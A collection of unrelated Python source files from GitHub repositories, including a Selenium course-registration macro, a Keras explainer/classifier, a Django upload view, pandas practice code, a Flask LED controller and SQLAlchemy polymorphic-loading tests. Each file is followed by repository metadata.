self.driver.implicitly_wait(5)
self.driver.switch_to.frame('Main') # iframe 전환
login_id = driver.find_element(By.ID, 'txtUserID')
login_pw = driver.find_element(By.ID, 'txtPwd')
login_bt = driver.find_element(By.ID, 'btn-login')
login_id.send_keys(self.user_id)
login_pw.send_keys(self.user_pw)
login_bt.click()
self.driver.implicitly_wait(5)
# 수강신청 버튼 클릭
time.sleep(0.5)
self.driver.execute_script("fnMenuLoad('/core/coreNotice1')")
self.driver.implicitly_wait(5)
start_bt = driver.find_element(By.CLASS_NAME, 'btnStart')
start_bt.click()
time.sleep(1)
self.tryGetLecture()
def checkAlert(self):
try:
alertBtn = self.driver.find_element(By.XPATH, "/html/body/div[2]/div[2]/div/div/div/div/div/div/div/div[4]/button[1]")
alertBtn.click()
time.sleep(0.5)
return True
except:
return False
def tryGetLecture(self):
'''
수강바구니 속 수강신청을 반복적으로 시도하는 메서드.
모든 강의를 잡으면 종료한다.
'''
# table_tr = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr')
# 수강바구니 목록 # 이걸로 하니까 안됨 -_-
lectureNames = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr/td[2]')
lectureNames = [x.text for x in lectureNames]
lectureBtns = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr/td[1]/button')
for i in range(len(lectureBtns)):
print(f"{lectureNames[i]} : {lectureBtns[i]}")
print(lectureNames)
elementNum = 1
#아래는 반복문 횟수를 보기위한 단순한 변수
iters = 0
reset = False # 수강신청이 성공했다면 반복을 초기화 하는 변수
# while len(table_tr) != 1:
while len(lectureBtns) != 1:
for i in range(2):
#과목명 변수
lectureName = self.driver.find_element(By.XPATH, '//*[@id="GridBasket"]/tbody/tr[@id="{}"]/td[2]'.format(elementNum)).text
selectBtn = self.driver.find_element(By.XPATH, '//*[@id="GridBasket"]/tbody/tr[@id="{}"]/td[1]/button'.format(elementNum))
selectBtn.click()
lectureBtns[elementNum].click()
## 테스트를 위한 확인 출력문
print(lectureName, f": 클릭함 {iters}-{i}")
print(lectureNames[elementNum], f": 클릭함 {iters}-{i}")
time.sleep(2)
time.sleep(0.1)
# 알림창이 있는 지 검사
while True: # 알림창이 계속 있으면 없을 때까지 반복
reset = self.checkAlert()
if reset == False:
break
if reset == True:
# 수강신청이 성공했다면 페이지가 리셋되고, 테이블이 변경되었을 것이다.
# 따라서 테이블 요소를 다시 가져와야 한다.
table_tr = driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr')
self.sendMessage(lectureName) # 슬랙봇으로 메시지 출력
print(f"<{lectureName}> 수강신청 성공~!")
self.sendMessage(lectureNames[elementNum]) # 슬랙봇으로 메시지 출력
print(f"<{lectureNames[elementNum]}> 수강신청 성공~!")
del lectureBtns[elementNum]
del lectureNames[elementNum]
reset = False
else:
elementNum += 1 #tr 을 하나씩 넘김
if elementNum > len(lectureBtns): # 접근하는 tr 원소의 숫자가 테이블의 최대 숫자보다 크다면
elementNum = 1 # 1로 초기화. 즉 다시 처음부터 돌라는 말.
iters += 1
print("All Clear~!")
if __name__=="__main__":
user_id, user_pw, hook = getUserInfo()
# driver_path = "C:\chromedriver\chromedriver.exe"
driver = webdriver.Chrome(driver_path)
gc = GetCourses(user_id, user_pw, hook, driver)
# 매크로 시작
gc.getSugangUrl()
| kyeul611/Automation_repo | 수강신청_매크로/getCourses.py | getCourses.py | py | 7,357 | python | ko | code | 0 | github-code | 50 |
25535630570 | words = [
'engender',
'karpatka',
'othellolagkage',
'ptolemaic',
'retrograde',
'supplant',
'undulate',
'xenoepist',
'abberation',
]
def get_rotating_point_idx_simple(l):
# linear
prev = None
for idx, item in enumerate(l):
if prev and item < prev:
return idx
prev = item
return 0
def get_rotating_point_idx(l):
if len(l) == 1:
return 0
if len(l) == 2:
return min(enumerate(words), key=lambda x: x[1])[0]
# binary search-like approach
left = 0
right = len(l)
anchor = l[0]
while right > left + 1:
mid = (left + right) // 2
if l[mid] > anchor:
left = mid
elif l[mid] < anchor:
right = mid
if mid + 1 < len(l):
items = [l[i] for i in range(mid - 1, mid + 1 + 1)]
else:
items = [l[i] for i in range(mid - 1, mid + 1)]
target = min(enumerate(items), key=lambda x: x[1])[0] + mid - 1
return target if words[target] < anchor else 0
index = get_rotating_point_idx_simple(words)
print(words[index])
index = get_rotating_point_idx(words)
print(words[index])
| trueneu/algo | interviewcake/rotating_point.py | rotating_point.py | py | 1,158 | python | en | code | 0 | github-code | 50 |
42000639061 | from Explainer import explainer
from VGG import vgg
from ResNet50Mod import resnet50
from tensorflow.keras.utils import plot_model
from tensorflow.keras import layers as KL
from tensorflow.keras.models import Model
import os
import matplotlib.pyplot as plt
class ExplainerClassifierCNN:
""" ExplainerClassifierCNN class
"""
def __init__(
self,
img_size=(224, 224),
num_classes=2,
clf="resnet50",
init_bias=3.0,
pretrained=False,
):
"""__init__ class constructor
Keyword Arguments:
img_size {tuple} -- image dimensions (default: {(224, 224)})
num_classes {int} -- number of classes (default: {2})
clf {str} -- classifier architecture (default: {"resnet50"})
init_bias {float} -- initial bias for explainer's batch normalisation layer (default: {3.0})
pretrained {bool} -- whether or not to load a pretrained model (resnet pretrained on imagenet) (default: {False})
"""
super(ExplainerClassifierCNN, self).__init__()
self.img_size = img_size
self.num_classes = num_classes
self.clf = clf
self.init_bias = init_bias
self.pretrained = pretrained
# classifier
if self.clf == "resnet50":
self.classifier = resnet50(
img_size=self.img_size,
num_classes=self.num_classes,
pretrained=self.pretrained,
)
else:
self.classifier = vgg(img_size=self.img_size, num_classes=self.num_classes)
# explainer
self.explainer = explainer(img_size=self.img_size, init_bias=self.init_bias)
# build the model
self.build_model()
def build_model(self):
"""build_model builds the end-to-end model
"""
input_image = KL.Input(tuple(list(self.img_size) + [3]), name="input_img")
explanation = self.explainer(input_image)
decision = self.classifier([explanation, input_image])
self.e2e_model = Model(inputs=[input_image], outputs=[explanation, decision])
def save_architecture(self, timestamp, path):
"""save_architecture saves a plot of the whole architecture and of its submodules
Arguments:
timestamp {str} -- destination folder name
path {str} -- destination path
"""
self.exp_model_filename = timestamp + "_model_exp.png"
self.dec_model_filename = timestamp + "_model_clf.png"
self.e2e_model_filename = timestamp + "_model_e2e.png"
plot_model(self.explainer, to_file=os.path.join(path, self.exp_model_filename))
print("Model printed to " + os.path.join(path, self.exp_model_filename))
plot_model(self.classifier, to_file=os.path.join(path, self.dec_model_filename))
print("Model printed to " + os.path.join(path, self.dec_model_filename))
plot_model(self.e2e_model, to_file=os.path.join(path, self.e2e_model_filename))
print("Model printed to " + os.path.join(path, self.e2e_model_filename))
def save_explanations(
self, datagen, phase, path, test=False, classes=None, cmap=None,
):
"""save_explanations generates and saves explanations for a set of images given by the data generator
Arguments:
datagen {tf.keras.utils.Sequence} -- data generator
phase {int} -- training phase
path {str} -- directory to store the generated explanations
Keyword Arguments:
test {bool} -- whether we are running inference on the test set or not (default: {False})
classes {list} -- list of class names (default: {None})
cmap {str} -- matplotlib colourmap for the produced explanations (default: {None})
"""
# defines colourmap and pixel value range
if cmap == "None":
cmap = "seismic"
mode = "captum" # for better comparison with captum methods
vmin, vmax = -1, 1
else:
vmin, vmax = 0, 1
mode = "default"
print("\nSAVING EXPLANATIONS")
timestamp = path.split("/")[-1]
for batch_imgs, input_dict in datagen:
batch_labels = datagen.batch_labels
batch_names = datagen.batch_names
batch_expls, batch_probs = self.e2e_model.predict(
(batch_imgs, input_dict), verbose=0
)
# traverse the batch and plot and save each generated explanation
for idx, img in enumerate(batch_imgs):
img = batch_imgs[idx]
expl = batch_expls[idx]
string = "Label: " + classes[batch_labels[idx]] + "\n"
for i, c in enumerate(classes):
string += c + " " + str(round(batch_probs[idx][i], 6,)) + "\n"
# saves figure comparing the original image with the generated explanation side-by-side
plt.figure(1, figsize=(12, 5))
plt.subplot(121)
ax = plt.gca()
ax.relim()
ax.autoscale()
ax.axes.get_yaxis().set_visible(False)
ax.axes.get_xaxis().set_visible(False)
plt.title("Original Image", fontsize=14)
plt.imshow(img)
plt.subplot(122)
ax = plt.gca()
ax.axes.get_yaxis().set_visible(False)
ax.axes.get_xaxis().set_visible(False)
plt.title("Explanation", fontsize=14)
plt.imshow(expl, vmin=vmin, vmax=vmax, cmap=cmap)
plt.text(
0.91, 0.5, string, fontsize=12, transform=plt.gcf().transFigure
)
if test:
plt.savefig(
os.path.join(
path,
"{}_phase{}_ex_img_test_{}_{}_{}".format(
timestamp,
str(phase),
mode,
cmap,
batch_names[idx].split("/")[-1],
),
),
bbox_inches="tight",
transparent=True,
pad_inches=0.1,
)
else:
plt.savefig(
os.path.join(
path,
"{}_phase{}_ex_img_{}".format(
timestamp, str(phase), batch_names[idx].split("/")[-1],
),
),
bbox_inches="tight",
transparent=True,
pad_inches=0.1,
)
plt.close()
print()
| icrto/xML | Keras/ExplainerClassifierCNN.py | ExplainerClassifierCNN.py | py | 6,917 | python | en | code | 10 | github-code | 50 |
39545271542 | from astropy.coordinates import SkyCoord
from astropy.units import Quantity
class Region:
"""
This is the base class for describing a region.
You must specify the diameter (diam) or
the height and width of the region but not both at the same time.
Args:
name (str): The name of the region.
coords (SkyCoord): The coordinates of the region.
diam (Quantity, optional): The diameter of the region. Defaults to None.
height (Quantity, optional): The height of the region. Defaults to None.
width (Quantity, optional): The width of the region. Defaults to None.
serial (int): The serial id of the region in the cdalvaro database. Defaults to None.
Raises:
ValueError: If either diam neither height or width are specified.
ValueError: If diam and height or width are specified at the same time.
ValueError: If height and width are not specified at the same time.
"""
def __init__(self,
name: str,
coords: SkyCoord,
diam: Quantity = None,
height: Quantity = None,
width: Quantity = None,
serial: int = None):
if diam is None and (height is None or width is None):
raise ValueError("You must specify 'diam' argument or 'height' and 'width' arguments")
elif diam is not None:
if not (height is None and width is None):
raise ValueError("You cannot specify 'diam' with 'height' or 'width' arguments")
self.diam = diam
else:
if height is None or width is None:
raise ValueError("You must specify both 'height' and 'width' arguments")
self.height = height
self.width = width
self.name = name
self.coords = coords
self.serial = serial
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return self.__str__()
def __eq__(self, other) -> bool:
if isinstance(other, Region):
return self.name == other.name
return self.name == f"{other}"
def __hash__(self) -> int:
return hash(self.name)
| cdalvaro/decocc | cdalvaro/models/region.py | region.py | py | 2,226 | python | en | code | 0 | github-code | 50 |
39321151581 | from client import *
import signal
client = CrypticClient(log_level=logging.INFO)
client.URI = "ws://localhost:8000"
client.start_client()
def receiver(json: Json):
print(json)
def action():
action = "signup"
client.add_receiver(action, receiver)
json = Json(action=action, id="mimi", key="prmp")
# client.send_json(json)
action = "signin"
client.add_receiver(action, receiver)
json = Json(action=action, id="mimi", key="prmp")
client.send_json(json)
print(json)
client.on_connected = action
def close_sig_handler(signal: signal.Signals, frame):
global c
c += 1
# os.system(f'{os.sys.executable} {os.sys.argv[0]}')
print(f"Exiting in {STOP}: {c}", end="\r")
if c > STOP:
client.send_close(reason="Test")
client.shutdown()
exit()
else:
action()
c = 1
STOP = 2
signal.signal(signal.SIGINT, close_sig_handler)
while 1:
...
| prmpsmart/cryptic | main_client.py | main_client.py | py | 938 | python | en | code | 0 | github-code | 50 |
13120989975 | from flask import Flask
import RPi.GPIO as GPIO
Rled = 4; Bled = 5
GPIO.setmode(GPIO.BCM)
GPIO.setup(Rled, GPIO.OUT)
GPIO.setup(Bled, GPIO.OUT)
app = Flask(__name__)
@app.route("/")
def mainPage():
return '''
<h1> Main Page </h1>
<h2> RED LED <a href="led/red/on">on</a> <a href="/led/red/off">off</a></h2>
<h2> BLUE LED <a href="led/blue/on">on</a> <a href="/led/blue/off">off</a></h2><br>
'''
@app.route("/led/<color>/<status>")
def led(color, status):
if color == "red":
if status == "on":
GPIO.output(Rled, GPIO.HIGH)
return '''
<h1>RED LED ON</h1>
<h2><a href="/">Go Main Page</a></h2>
'''
elif status == "off":
GPIO.output(Rled, GPIO.LOW)
return '''
<h1>RED LED OFF</h1>
<h2><a href="/">Go Main Page</a></h2>
'''
elif color == "blue":
if status == "on":
GPIO.output(Bled, GPIO.HIGH)
return '''
<h1>BLUE LED ON</h1>
<h2><a href="/">Go Main Page</a></h2>
'''
elif status == "off":
GPIO.output(Bled, GPIO.LOW)
return '''
<h1>BLUE LED OFF</h1>
<h2><a href="/">Go Main Page</a></h2>
'''
if __name__ == "__main__":
try:
app.run(host="0.0.0.0")
finally:
GPIO.cleanup()
| tldus2355/2021-IoT-Project | 07_web/flask_led_task.py | flask_led_task.py | py | 1,501 | python | en | code | 0 | github-code | 50 |
2392266684 | def getStudentNames():
studentsList = []
for i in range(0,12):
print(i)
studentName = str(input("Enter the student's name: "))
studentsList.append(studentName)
return studentsList
def getAlphabeticalList(tempList):
tempList.sort
alphabeticalList = tempList
return alphabeticalList
def getReverseList(tempList):
tempList.reverse()
reversedList = tempList
return reversedList
def writeListToFile(tempList, fileName):
writtenFile = open(fileName, 'w')
for item in tempList:
writtenFile.write(item + '\n')
writtenFile.close()
def readListFromFile(fileName):
readFile = open(fileName, 'r')
tempList = readFile.readlines()
readList = []
for item in tempList:
readList.append(item.split('\n')[0])
return readList
def main():
studentsList = getStudentNames()
studentsList = getAlphabeticalList(studentsList)
studentsList = getReverseList(studentsList)
studentsList.append('Rene Polanco')
studentsList.insert(0, 'Logan Ingram')
writeListToFile(studentsList, 'names.txt')
readList = readListFromFile('names.txt')
print(readList)
studentTuple = tuple(studentsList)
main() | Loganphx/ProgrammingFundamentalsI | Lab 7/logan_ingram_lab7b.py | logan_ingram_lab7b.py | py | 1,216 | python | en | code | 0 | github-code | 50 |
11269807288 | import pandas as pd
from pandas import Series, DataFrame
import numpy as np
obj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])
obj
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0)
obj2
obj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
obj3
obj3.reindex(range(6))
obj3.reindex(range(6), method='ffill')#bfill 뒤의 값으로 채워 넣는다
frame = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'],
columns=['Ohio', 'texas', 'California'])
frame
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
frame2
states = ['Ohio', 'texas', 'California']
frame.reindex(index=['a', 'b', 'c', 'd'], method='ffill')
obj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])
new_obj = obj.drop('c')
new_obj
data = DataFrame(np.arange(16).reshape((4, 4)),
index=['Ohio', 'Colorada', 'Utah', 'New York'],
columns=['one', 'two', 'three', 'four'])
data
data.drop(['Colorada', 'Ohio'])
data.drop('two',axis=1)
data.drop(['two', 'four'],axis=1)
obj = Series(np.arange(4.), index=['a', 'b', 'c', 'd'])
obj
obj['b']
obj[1]
obj[2:4]
obj[['b', 'a', 'd']]
obj[[1, 3]]
obj[[1, 3]]
obj[obj < 2]
obj['b':'c'] = 5
obj
data
data['two']
data[['two', 'one']]
data[:2]
data[data['three'] > 5]
data < 5
data[data < 5] = 0
data
data.loc['Colorada', ['two', 'three']]#column , [row select]
data.loc['Colorada']
data.loc[['Colorada', 'Ohio'], ['two', 'three']]
data.iloc[2]
data.loc[:'Utah', 'two']#행 Utah 까지 / 열 => 'two'
data
data.ix[data.three > 5, :3]
data.three > 5
df1 = DataFrame(np.arange(9.).reshape((3, 3)), columns=list('bcd'),
index=['Ohio', 'Texas', 'Colorado'])
df2 = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
df1
df2
df1+df2
df1.add(df2, fill_value=0)
df2.add(df1, fill_value=0)
arr = np.arange(12.).reshape((3, 4))
arr
arr[0]
arr - arr[0]
frame = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
series = frame.iloc[0]
series
frame
frame + series
series2 = Series(range(3), index=['b', 'e', 'f'])
series2#이건 아무런 name 이 없음
frame + series2
series
type(frame['b'])
type(frame)
series3 = frame['d']
frame.sub(series3, axis=0)
frame
series3
frame = DataFrame(np.random.randn(4, 3), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
frame
np.abs(frame)#절대값
f = lambda x: x.max() - x.min()
frame.apply(f)
obj = Series(range(4), index=['d', 'a', 'b', 'c'])
obj.sort_index()
frame = DataFrame(np.arange(8).reshape((2, 4)), index=['three', 'one'],
columns=['d', 'a', 'b', 'c'])
frame
frame.sort_index(axis=0)
frame.sort_index(axis=1, ascending=False)
frame.sort_index(axis=1)
obj = Series([4, 7, -3, 2])
obj
obj.sort_values()
obj = Series([4, np.nan, 7, np.nan, -3, 2])
obj
obj.sort_index()
obj.sort_values()
frame = DataFrame({'b': [4, 7, -3, 2], 'a': [0, 1, 0, 1]})
frame
frame.sort_values(by='b')#b의 값기준으로 정렬
frame.sort_index(axis=1).sort_values(by='b') #a, b 순서 정렬 => b의 값별로 정렬
frame.sort_values(by=['a', 'b'])
'''
min 같은 값을 가지는 그룹을 낮은 순위로
max 같은 값을 가지는 그룹을 높은 순위로
average 같은 값을 가지는 항목의 평균 값을 순위로(defalut)
first 데이터 내에서 위치에 따라 순위를 매김
'''
obj = Series([7, 0-5, 7, 4, 2, 0, 4])
obj.rank()#공통도 나타 날 수 있음
obj.rank(method='first')#데이터 상의 나타내는 순서
obj.rank(ascending=False, method='max')#내림차순 순위
frame.rank(axis=1)
frame
obj = Series(range(5), index=['a', 'a', 'b', 'b', 'c'])
obj
obj.index.is_unique
obj['a']#중복되면 Series 값
obj['c']#중복되지 않으면 스칼라값
df = DataFrame(np.random.randn(4, 3), index=['a', 'a', 'b', 'b'])
df
df.loc['b']
df = DataFrame([[1.4, np.nan], [7.1, -4.5], [np.nan, np.nan], [0.75, -1.3]], index=['a', 'b', 'c', 'd'], columns=['one', 'two'])
df
df.sum()
df.sum(axis=0)
df.sum(axis=1)
df.mean(axis=1, skipna=False)#na 포함하겠다.
df
df.describe()
df = DataFrame(np.random.normal(loc=0, scale= 0.01, size=(5,4)),
index=['2014-07-07', '2014-07-08', '2014-07-09', '2014-07-10', '2014-07-11',],
columns=['AAPL', 'GOOG', 'IBM', 'MSFT']
)
df.index.name = 'Date'
df
df.MSFT.corr(df.IBM)#NA가 아니고 연속하는 두 Series에 대해 상관관계를 계산
df.MSFT.cov(df.IBM)# 공분산
df.corr()#상관관계
df.cov()#공분산
obj = Series(['c', 'a', 'd', 'a', 'a', 'b', 'b', 'c', 'c'])
obj
obj.unique()
obj.value_counts()
pd.value_counts(obj.values, sort=False)
mask = obj.isin(['b', 'c'])
mask
data = DataFrame({'Q1': [1, 3, 4, 3, 4],
'Q2': [2, 3, 1, 2, 3],
'Q3': [1, 5, 2, 4, 4]})
data
result = data.apply(pd.value_counts).fillna(0)
result
data
result = data.apply(pd.value_counts).fillna(0)#안에 있는 값들을 인덱스로 만듬.
string_data = Series(['aardvark', 'artichoke', np.nan, 'avocado'])
string_data
string_data.isnull()
string_data[0] = None
string_data.isnull()
#누락된 데이터 골라내기
from numpy import nan as NA
data = Series([1, NA, 3.5, 7])
data.dropna()
data[data.notnull()]
data = DataFrame([[1, 6.5, 3], [1, NA, NA],
[NA, NA, NA], [NA, 6.5, 3]])
data
data.dropna()#NA가 있으면 싹다~ 드랍시킴.
data.dropna(how='all')#전부 NA 인 로우만 드랍시킴
data[4] = NA
data
data.dropna(axis=1, how='all')
df = DataFrame(np.random.randn(7, 3))
df.iloc[:4, 1] = NA; df.iloc[:2, 2] = NA
df
df.dropna(thresh=3)#몇개 이상만
df.fillna(0)#0으로 누락된 값 채우기
df.fillna({1: 0.5, 2: -1})
_ = df.fillna(0, inplace=True)
df
df = DataFrame(np.random.randn(6, 3))
df
df.iloc[2:, 1] = NA; df.iloc[4:, 2] = NA
df
df.fillna(method='ffill')
df.fillna(method='ffill', limit=2)#2만 채우기
data = Series([1, NA, 3.5, NA, 7])
data
data.fillna(data.mean())
'''
계층적 색인
'''
data = Series(np.random.randn(10),
index=[['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'],
[1, 2, 3, 1, 2, 3, 1, 2, 2, 3]])
data
data.index
data['b']
data['b':'c']
data.loc[['b', 'd']]
data[:, 2]#하위 객체
data.unstack()
data.unstack().stack()
frame = DataFrame(np.arange(12).reshape((4, 3)),
index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],
columns=[['Ohio', 'Ohio', 'Colorado'],
['Green', 'Red', 'Green']])
frame
frame.index.names = ['key1', 'key2']
frame.columns.names = ['state', 'color']
frame
frame['Ohio']
frame.unstack().unstack()
frame.sum(level='key2')#key2를 기준으로 값을 합침
frame.sum(level='color', axis=1)
frame
frame = DataFrame({'a': range(7), 'b': range(7, 0, -1),
'c': ['one', 'one', 'one', 'two', 'two', 'two','two'],
'd': [0, 1, 2, 0 ,1, 2, 3]})
frame
frame2 = frame.set_index(['c', 'd'])
frame2
frame2 = frame.set_index(['c', 'd'], drop=False)
frame2
frame2.reset_index()
ser = Series(np.arange(3.), index=['a', 'b', 'c'])
ser[-1]
| epicarts/python3_practice | data_analysis/essential_pandas.py | essential_pandas.py | py | 7,119 | python | ko | code | 0 | github-code | 50 |
8193695529 | from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
import os
from .serializers import *
from django.core.files import File
from django.conf import settings
from rest_framework.response import Response
from django.http import HttpResponse
import uuid
class UploadViewSet(viewsets.ViewSet):
permission_classes = [IsAuthenticated]
def post(self, request):
file = request.FILES.get("file", None)
ext = os.path.splitext(file.name)[-1]
name = uuid.uuid4().hex
filename = name+ext
pathname = os.path.join(settings.MEDIA_ROOT, filename)
with open(pathname, 'wb+') as destination:
for chunk in file.chunks():
destination.write(chunk)
data = {
"uid": request.user.openid,
"src": pathname
}
file = UploadSerializer(data=data)
if file.is_valid():
file.save()
ret = {
"error_code": 0,
"data": file.data
}
return Response(ret)
else:
ret = {
"error_code": 500,
"error": file.errors
}
return Response(ret)
def get(self, request, fid):
file = UploadModel.objects.filter(id=fid)[0]
src = file.src
with open(src, 'rb') as f:
file = File(f)
response = HttpResponse(file.chunks(), content_type='APPLICATION/OCTET-STREAM')
response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(src)
response['Content-Length'] = os.path.getsize(src)
return response
| carryuteam/CarryU-API | fileupload/views.py | views.py | py | 1,717 | python | en | code | 0 | github-code | 50 |
21558532856 | from sqlalchemy import exc
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import backref
from sqlalchemy.orm import defaultload
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import lazyload
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectin_polymorphic
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import with_polymorphic
from sqlalchemy.sql.selectable import LABEL_STYLE_TABLENAME_PLUS_COL
from sqlalchemy.testing import assertsql
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.assertions import expect_raises_message
from sqlalchemy.testing.assertsql import AllOf
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.assertsql import EachOf
from sqlalchemy.testing.assertsql import Or
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from ._poly_fixtures import _Polymorphic
from ._poly_fixtures import Company
from ._poly_fixtures import Engineer
from ._poly_fixtures import GeometryFixtureBase
from ._poly_fixtures import Manager
from ._poly_fixtures import Person
class BaseAndSubFixture(object):
use_options = False
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
adata = Column(String(50))
bs = relationship("B")
type = Column(String(50))
__mapper_args__ = {
"polymorphic_on": type,
"polymorphic_identity": "a",
}
class ASub(A):
__tablename__ = "asub"
id = Column(ForeignKey("a.id"), primary_key=True)
asubdata = Column(String(50))
cs = relationship("C")
if cls.use_options:
__mapper_args__ = {"polymorphic_identity": "asub"}
else:
__mapper_args__ = {
"polymorphic_load": "selectin",
"polymorphic_identity": "asub",
}
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
a_id = Column(ForeignKey("a.id"))
class C(Base):
__tablename__ = "c"
id = Column(Integer, primary_key=True)
a_sub_id = Column(ForeignKey("asub.id"))
@classmethod
def insert_data(cls, connection):
A, B, ASub, C = cls.classes("A", "B", "ASub", "C")
s = Session(connection)
s.add(A(id=1, adata="adata", bs=[B(), B()]))
s.add(
ASub(
id=2,
adata="adata",
asubdata="asubdata",
bs=[B(), B()],
cs=[C(), C()],
)
)
s.commit()
def _run_query(self, q):
ASub = self.classes.ASub
for a in q:
a.bs
if isinstance(a, ASub):
a.cs
def _assert_all_selectin(self, q):
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.id AS a_id, a.adata AS a_adata, "
"a.type AS a_type FROM a ORDER BY a.id",
{},
),
AllOf(
EachOf(
CompiledSQL(
"SELECT asub.id AS asub_id, a.id AS a_id, "
"a.type AS a_type, "
"asub.asubdata AS asub_asubdata FROM a JOIN asub "
"ON a.id = asub.id "
"WHERE a.id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
{"primary_keys": [2]},
),
CompiledSQL(
# note this links c.a_sub_id to a.id, even though
# primaryjoin is to asub.id. this is because the
# cols a.id / asub.id are listed in the mapper's
# equivalent_columns so they are guaranteed to store
# the same value.
"SELECT c.a_sub_id AS c_a_sub_id, "
"c.id AS c_id "
"FROM c WHERE c.a_sub_id "
"IN (__[POSTCOMPILE_primary_keys])",
{"primary_keys": [2]},
),
),
CompiledSQL(
"SELECT b.a_id AS b_a_id, b.id AS b_id FROM b "
"WHERE b.a_id IN (__[POSTCOMPILE_primary_keys])",
{"primary_keys": [1, 2]},
),
),
)
self.assert_sql_execution(testing.db, lambda: self._run_query(result))
class LoadBaseAndSubWEagerRelOpt(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = True
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(
selectin_polymorphic(A, [ASub]),
selectinload(ASub.cs),
selectinload(A.bs),
)
)
self._assert_all_selectin(q)
class LoadBaseAndSubWEagerRelMapped(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = False
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(selectinload(ASub.cs), selectinload(A.bs))
)
self._assert_all_selectin(q)
class FixtureLoadTest(_Polymorphic, testing.AssertsExecutionResults):
def test_person_selectin_subclasses(self):
s = fixture_session()
q = s.query(Person).options(
selectin_polymorphic(Person, [Engineer, Manager])
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, "
"people.type AS people_type FROM people",
{},
),
AllOf(
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
),
)
eq_(result, self.all_employees)
def test_load_company_plus_employees(self):
s = fixture_session()
q = (
s.query(Company)
.options(
selectinload(Company.employees).selectin_polymorphic(
[Engineer, Manager]
)
)
.order_by(Company.company_id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT companies.company_id AS companies_company_id, "
"companies.name AS companies_name FROM companies "
"ORDER BY companies.company_id",
{},
),
CompiledSQL(
"SELECT people.company_id AS people_company_id, "
"people.person_id AS people_person_id, "
"people.name AS people_name, people.type AS people_type "
"FROM people WHERE people.company_id "
"IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2]},
),
AllOf(
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN (__[POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
),
)
eq_(result, [self.c1, self.c2])
class TestGeometries(GeometryFixtureBase):
